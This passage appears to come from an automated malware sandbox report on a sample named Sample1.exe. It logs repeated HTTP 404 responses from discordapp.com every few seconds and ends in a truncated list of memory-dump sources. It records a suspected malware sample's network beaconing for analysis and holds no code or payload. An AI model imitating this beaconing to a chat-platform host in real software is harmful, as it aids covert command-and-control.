Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:13:58 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=61uwAg9_iZQ1d2KW6Rh0mf0MD2xQICb4BE6kYPd4xtg-1736950438-1.0.1.1-bMHpg3FE1Hnrh.pnFppkbh48Nkoe9q3FsE8VGUw3I6HvpVCcFRwMp5lqwKQaiMxX9vEbjabfVWCXnFcGEq_MPg; path=/; expires=Wed, 15-Jan-25 14:43:58 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xj7wmGIWY5MTWxFBBCdCorJDwHgOzlq8rjfuWtZUC87PLFjm%2F%2BX3otBKvlCZv%2BSrztB1%2B1GordgBlMFcJ7xUeXKm5dQRrgpC10Xv82D380%2B2dx6b5nejYy2sJOp9P9RHIY0wOA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=JhuDanFC2evAqrF10mG8pXCG61AVrVZs1HJOZZPBpF0-1736950438748-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902678320973c343-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:14:04 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=8SEsWEEPngeDi.8dQZkzPWUyZtAX3kHPeaPrDp_I9CI-1736950444-1.0.1.1-3ODahXziwWni.2jLrewOH0iMQnZ53s9y.QfyKDkrXtf59quwJq_tVQlxF0l9oQwQq820dojZpUqSkYTC50MBMA; path=/; expires=Wed, 15-Jan-25 14:44:04 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z4GHNrXUYKS%2BuEzIyRu8%2BxCeJNtzV8fL1xFBqnJL1EjahPrthJXcah4iPZdFJB%2FLJ%2F%2BFJD7siNvSFTzH%2BVGUM5kp9j7r7vSY%2BCrTH7giJWxln5bFmWZZTThzE74s8Q6zx6pOnQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=_VR18RE1wWryPwLEiKVxcHZ.vbIZ96a9JOWkh..p_Gg-1736950444360-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267855282f422e-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:14:09 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=yDAG_3avNVVJnpdBkXKWcZgRW4oBa0R72usFkQVmQ44-1736950449-1.0.1.1-bSbiHWAvwf7G7JuPqGVnNMzVVdvXCJTcYmrNjpNrbw7bBxpB7__RYvPi1Q0hcPhuGxi2dPlW4yZ5ZcIdGuqP8Q; path=/; expires=Wed, 15-Jan-25 14:44:09 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jaYe7D78YQRM69%2BmScR8fwL7d0tf1hkjiXqTljpan9%2FNJDYd7W6TBsQJwnMivvSwMc%2B2kG8VGnxGoAdkQXqJqq3l9YjD4zaTBAHntOQ2PHX1bnq4uEMJaahHGHuiAuPSDPYpcA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=wTIvUpx6cAahjmnvGJSAswzYJpvYSNc5s49o2NtSaYY-1736950449972-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902678783883c475-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:14:15 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=e9QxghO3PrfU_hUiqBrGgML594FTvJKsItaOZb28aP4-1736950455-1.0.1.1-sabzhXOceyUcnH9k5sZQu1hcmOvvNQQCo1CLMlJrWDirFh_xjUVfOAKgGx.gmkNA6edJITPXiOJ1QVRg.h7QeA; path=/; expires=Wed, 15-Jan-25 14:44:15 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PlgHLA2IXMZdvZtz6HiYbbJiyVCMjFeO8O4KHQ6dSb6Nm84airr4%2B7vetaGM0FX0eiITDdGCIJWqpMdQmf1M2zWnH%2FtaGlsZ7SUCBOB8SMVRWRtHJBVFVEHVJALdlkeybitutg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=gw7y6PAzpr1.Yrl.asPdToojGgQahd9lfjrm4ImKeRk-1736950455651-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 9026789b98d915a3-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:14:21 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=thfy1YcVaG218OgTdIBtYAxplZ7Y1DBmEfX1dWh4cro-1736950461-1.0.1.1-_lQOfIveQcIvANK8Jt5UQOGlwTYBjOYlG2xsSYHVrNMCZ3qFdM7fzbRM4NHOFXFkJxYNOmzAMAVWwnd6IiG8WQ; path=/; expires=Wed, 15-Jan-25 14:44:21 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sdl06Y%2FDWE0UUJE6S9zDSnA0UEtOA1eK%2FQ9A14QaJ84SXGj3dRm0o0gpWcg9Oin9iClzo54Lup7nDrtM8EhnOOnq0HrSVLKYbdlmvB4H%2FxgZnYyBC7VB9YRyKpZwSwexsbSmxA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=afonBfcQ6SlQB9pWe7ov27ip6CDvRADiPVgXhj147Ac-1736950461295-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902678beee991881-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:14:26 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=ec7eMl3fUDW_etYeRV8RVR6PtYCDuzm59I7HpswS._M-1736950466-1.0.1.1-kPNlxmcSpe0sYDU.dmxOQr2r6r23gFCbXnwHkJ1W5SS8VukGUhXf19Z9M6j7T_bupdAtF2AttsnfWNxjYVHTgw; path=/; expires=Wed, 15-Jan-25 14:44:26 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sbJirnRfNiAqyOwUwejSPDmrXCOXmVGWoZBjeOgwNvTQO26Hgc2hxaGFPrwIXxWbbnyoBjvR%2FLrKDlvj1b3one8C9DqsvdBA%2BE%2BQ3ZF0WD2Rlv07jrDrJ0b%2F7lv6T621Fe6r9Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=FTWb.gaznAHm_yjaqXirKnJjK7cR9s7JML.yiCK3qbw-1736950466922-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902678e21c0e2394-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:14:32 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=_6xMb.N372P1_Ofd_N0qmjkTewkYSXY_DBiIwshfu94-1736950472-1.0.1.1-aC4rcOrXzo61jJJ6QJsuSvN_YbO0iX.wrC.v4fZ76P55qt1hb4QwV2sXWQ7R92q4BZDB4OzQ5dLsNtZ0s.gdFQ; path=/; expires=Wed, 15-Jan-25 14:44:32 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=txElbe0oAzUP0%2FD%2BX6RpXnadAt%2Fyi1mp9d6NYEFFggDkwGOR3ZL1UZsJjIVzn0AkXuAoAg4CiNw9DxqVWlbLvk4ySQMLw7QK%2F4DEsMEVj0SmaL3CGGVJvs3ps2oNfKMIDQlm0g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=tK0NS4De8aqkdk.seFrU2N7zJ_2hBVRb81nmciK8fqw-1736950472567-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902679053f867c6c-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:14:38 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=TqhqwJQvyCWMtCuOYuGhhexaLNMyQ4jlMaGv25FFhXA-1736950478-1.0.1.1-XwuhKLPi5IPt.nz82RzYuOLGoFzLzMJce1zdLr5lzbz4lW_bgCTIR9AxQRQr0WJzYRy2sVUnG4B0FZ6QMPO03Q; path=/; expires=Wed, 15-Jan-25 14:44:38 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bhx6B5V7hefcVU8SJWavgxT099fII%2BAu5ztWSfBCvn9iT8IJNJ7eL%2F4NOwS7p%2Fd5jWC0257kFTt1Og54PDriowXPc3YjN46nTW4SoMGbIUpZB5aIjo3wpiaP5CG%2Be0ZU2j%2FIDg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=.29J3v_2m03ba.3M656HA09EJL5ng111XqlVNVfRhhU-1736950478214-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267928b89c41ed-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:14:43 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=h4lJuUSj2rMu7o8Kd058TqW8JZnFlCM6qVMhwKJCJfI-1736950483-1.0.1.1-fx8KsgblWMS.UESsJqyk5ksOdXCpm6s8GwxJGPLRTbQnKq_fxAw37Mtgkqbs9uWTh6XiY5dDEPccrAA4zMz5.g; path=/; expires=Wed, 15-Jan-25 14:44:43 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h7QyO5dz%2FMgPRTYTiry1RAARz2o38X431fyzgmaT0SOcQIndZ%2BcaQ6%2B8CyM8QifdEl2o6ZWORKdPMBUEEyInpGuZgfxkjmkgTIh%2BAIgusdRssoP6PDMC4TPYlFJ6eM%2FvnhZFZw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=CG28CHavwXdgsqGf9b9kwdcom8xnyZHCf_yURhy2Eic-1736950483819-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 9026794bcd26c42c-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:14:49 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=WwYznyii0sCSR1HrD7ctQs4oppCDR.7tRvny8oBEyfo-1736950489-1.0.1.1-6l.GWZJspKMG9BQatmR63PuvYXQkpU_uBMCH8zDZKkyuk3dg3XwuxsmuaxezgKkArG6HZe_dvR_UhBEDi.qo0w; path=/; expires=Wed, 15-Jan-25 14:44:49 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8rriir5Gg4I0BC51wws4k19yS2FHWe1m05d9xx2BCTIhUif5wBByqYQqy%2BJVi36x%2BQyTuPnThj%2F4d0RHLEiM2wGtJxtolXjvWq3FZ7s1hySCkosSKitn%2BzmONJMAtGHqYX%2BmHg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=Eu84zhqoWHW8QXS8v0z5WyUfXb.2b85ORyWTK_WRo7w-1736950489428-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 9026796eddd742b3-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:14:55 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=PbQ3H495Sjneip6r5LOlvs3fcJopHYwZag.QHa51Zds-1736950495-1.0.1.1-m2MpxvHTLAIsQ3FB4z5X6vS_2Kx_Nwr2Zp6pSLU8m2EUUKw4Pw_QbBbfSo_0alaE4jxURvmyAgj40jB1pIXTZQ; path=/; expires=Wed, 15-Jan-25 14:44:55 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BeJeYb%2BFvH3NS8jJeAqc2Ex%2FqHyX9VrhEcdDqWnkr1ugLpaXcexvUktrUoTFrnG1vn4SNXjD0z80j74HrO90AWCiSuNtWm1PQqmOF0rF57CJqVF4hbQIFZCAW53nhrIQixenzg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=AIQBQAkZHhzsoVL34WvpUkXevk8d_LYVAt9eUbQmHyE-1736950495049-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267991fff38ccc-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:15:00 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=g4TYPrmcdQJQJ7gF_DEB9OXmwsCZI5j.1QrKmjzK6CI-1736950500-1.0.1.1-toBSNVx4UcByrGB7VrhomEF_sEKEYR4wmhLMcWznIZ0UlBNvQP6FU4F.fl_uci_PYZh7V14bUQ4_0oGAuytPAw; path=/; expires=Wed, 15-Jan-25 14:45:00 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=neLcJr%2FWWAvZ4YxEUHcMBH00mZdc466jGunKh5vQpTeyoLElZDq0LowpGGw6tgvPZWKv6HFVnK5lmc24t4%2Bxh5BQ%2BVH6LZxw6%2BJRXBp9WZKGPV0ATNKtHYjzTa7BulY4SWJotw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=yAvlV8SYe_spXDF6FywwbPmWuDH457jwPHl6M7f1lHQ-1736950500659-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902679b50aee7c8a-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:15:06 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=sqJDc229BkR2w.8Lc4UVSLRoelW_zGVGixuS1Uled94-1736950506-1.0.1.1-kg9tXd96gWeIHELpDUrDrXTlg8aPUgdo5.bk6lMbMi0ukR2pe6zBD5pR242kz3rGXo9AGGNXJCfInrA6hZALDQ; path=/; expires=Wed, 15-Jan-25 14:45:06 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6HrBLyWtJso86rTuBcwf%2FrJZtbUewUSoCzFXNPacIq53E52P2JdqbzGeW5Oe2uXKO%2FmwPiGABI9mwHqpnVHeHUnOmtv05x8O5DvUuteifjV1gwPAGQY9LwwyEHUAAAAuyIlHsg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=l8DnrFJAAt3snnz.CpHQDghv.rOvs4KM92dflfx_5t4-1736950506295-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902679d83a1d8cb4-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:15:11 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=7C8uFhVggI7jV3WOLrRi7w9oemH4ArLnxxJiuFk3cyE-1736950511-1.0.1.1-cKfwIGTk8NQy3ll7o2llj9DdElzU7Vv4qt8kNMd_wZ81m.kpX.xcM_95dPVkiDWu.R2Xnp451.FVRsDMnAdKXw; path=/; expires=Wed, 15-Jan-25 14:45:11 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VJt%2Bl5gF9I69aNJqgcBjU%2F2gTbdaTkBofa7qHz0KCu81O%2FmsZOPcHatoggmB7yZKv0RoUusJ9rcraw9xdDrG72GDP79CWKT2fSl04Ob43ZV6LdQLwJk%2BH0Hs9XjDAAN040b63g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=T_cXJmGzgW2wH3Et76Q8YMn_cTgAHbjSEsnX46latIo-1736950511918-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902679fb5d168ccd-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:15:17 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=VJ7shNHkaGlzY1W6oivzuutyFj.7gU3hdE2oIqfz8aA-1736950517-1.0.1.1-kv17TfpPtDhYclVlF2SRAROO9Tqv1GNvobOsSxif_9zvv0Sil0UBISSJ8x_Ove_IKFT69rEANVZGgeuyqZCUDg; path=/; expires=Wed, 15-Jan-25 14:45:17 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CcStBeBOC8vSpmOWF4i0uSSbFYO%2F0d9YeN7SrjT97%2FcFSxN9g7XDF6wHhDgykjQ%2BiTuK5x1OBEipr5%2Bwm%2BV8OpF5LQGbXf%2BrUdi9tXX5K2i%2FK2YsD6t0mvcH5H%2BlyYdcMXjVHQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=6vp.z3ecvr27foPGDgTQoChsZsE7PuqEet9bBZT9z5M-1736950517528-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267a1e7c5d0fa9-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:15:23 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=w96CmVd0buiWjMYYU_mAB1zNeyxpKeZnanh2JmsDa_4-1736950523-1.0.1.1-9_UaVEg2jseA9gyY2pw5k2yjIYkmrUOehVMhuL_mIAC0hhdTu27I4qPP_Dz9dSFk8DSX_KQ4R8LUeOrYM0Iihw; path=/; expires=Wed, 15-Jan-25 14:45:23 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Coy0I6l9HfcYMZ9aJfmyhxCLjqg5Bx1TELCmkTQOIzgGzK%2F8MuLQE0rMXlOGjEzdquGv5Wz2VVhm3HU9XTSQLkdACCo%2F1ZGb3CSjUy4c7uYapEe1wPt4dnBwfMF72MKgkG8mBw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=yEIxL6b39pMnYOO8kNfkIKxu1Pi11Bnfhv1oLOMaI.8-1736950523193-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267a41c9660f42-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:15:28 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=TqNMHq.1qQTgCL4oYVk1hvy0rUScrizuOMpm9FTR0W0-1736950528-1.0.1.1-cgzOgUUBwlzsCuS6Ekxkjj2GVz1x.Fkl5jEgM.vzkjWOKYivl1av.JqjHUROiA36AzPaVrZzOXiWEmNNaNYHmg; path=/; expires=Wed, 15-Jan-25 14:45:28 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QkDtbvjp29Y4dFxEDyAtn1GUiczT3GBEMgZUAJ9Gz%2Fus15ITjHG2ydb4DKJy6U69V%2B4HuxJkppGrDoJ6t5mICUdXerAW0xG4X%2BbrtejOQWVpGG0rTCucilOs9BiAcHd4zIbwfg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=FL6pkqMdrTkNhmtz9tt1.jbCH0wjTS02soY.jRSWV8I-1736950528851-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267a6538e443d6-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:15:37 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=91gSsXwlXihARGfUsEHuAB.36GgiyQXwic21QMGRKg0-1736950537-1.0.1.1-RyanWDg.TmqUktHQawF_ptI9r._k15yoGeP9oUsM9JSjk_HwidHGJt_KsvJQ4JpAKFobn4CWrVs1W5qlOnNNcg; path=/; expires=Wed, 15-Jan-25 14:45:37 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z0dIcaP5gRn85%2Bp%2BX8M5vl3HhBDeRLkep9PFty1mChVLDIGlMZLwvFlm%2B0dEKzwJJRRpU245w7pfyS%2BtKZTZ0mwn3Af2Yn%2BewUNJIp95wfnXtbsvqXov%2BtCg91LeMjg01Q81Uw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=XAjFlnv2Z.ta.Qh6.3hkLByjZBY16WKV95Zcm1HkGZY-1736950537171-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267a992df84244-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:15:42 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=WP5CpJ464xp7g8vIbW.Ec87avU7kj9IEd4QpoqcHhc4-1736950542-1.0.1.1-jQSkuRC7Ezf3PBLm7dSK83m4QBoTaB5Z_gHqvjpbN5.yuJ3.fCDbejhvGIh7yBkt5M3VlI6cCBViqY9cKSCy3g; path=/; expires=Wed, 15-Jan-25 14:45:42 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pJhadYMNB%2FTOQWFc19e1d5qEnmJWFCGhFODkiViNazikVXBQdkER241AKo%2BxoCu6Vo4WZdOxjQR%2BCdjnUFITtbaYPaW1eDzFiz6j1eKZJWg7xdqoNcGH8rllCw0oV6z3bY9kQQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=AI2ut1RvU.6YkR5bizgjQl0YAgnwdxLynpgCyv1RDDQ-1736950542756-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267abc29f68c72-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:15:48 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=DtpP3vpbfFDqdQk7b_TPK5fMz5sQcdy9nHoIx8mhQZo-1736950548-1.0.1.1-pCLQxVxM_.5_Pqci1SFOSd0AOw41MJRJld8nmf3E8pFNl2cxFvAOWD4TOT__PhrBEHaPwE5aR4A.qw9oKmN9vA; path=/; expires=Wed, 15-Jan-25 14:45:48 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=woT4obMTuoIVVptadG6ioEE%2B0LQgpULnI6WDy8VbhYlIFH8FaTEy5ItV3J%2F%2BmwqMNhU%2BZlrHAUWo7862NhwqqBGRWFwmXn4%2BhtOlyp%2Bjy0OUZR7l6FI6FhI1mPB1lc8VL%2BZnYA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=.ipEcSFjk5s1DH8Dkn_UuPOMMkXa3OokcIyuDLt9dEQ-1736950548364-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267adf2ac98cc3-EWRalt-svc: h3=":443"; ma=86400

Source: Sample1.exe, 00000000.00000002.3799428208.00000000025CC000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.0000000002585000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.000000000268B000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.0000000002409000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.0000000002490000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 